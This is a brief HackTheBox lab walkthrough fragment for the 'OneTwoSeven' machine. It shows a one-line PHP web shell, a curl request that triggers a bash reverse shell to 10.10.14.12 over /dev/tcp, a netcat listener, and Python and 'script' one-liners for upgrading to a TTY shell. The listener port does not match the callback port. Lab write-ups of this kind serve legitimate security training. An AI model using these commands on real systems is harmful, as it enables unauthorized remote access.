.
┌─[puck@parrot-lt]─[~/htb/onetwoseven] └──╼ $cat cmd.php <?php system($_GET['cmd']); ?>
.
┌─[✗]─[puck@parrot-lt]─[~/htb/onetwoseven] └──╼ $curl -G http://localhost:60080/addons/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
i used a pentestmonkey php reverse shell, so now just setup a nc listener and catch your shell
nc -lvp 443
now we have the shell, we can try to get a TTY shell with python,
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c 'import pty; pty.spawn("/bin/sh")' |
however if python was not installed, i use this
script /dev/null -c bash
voila now we have a TTY Shell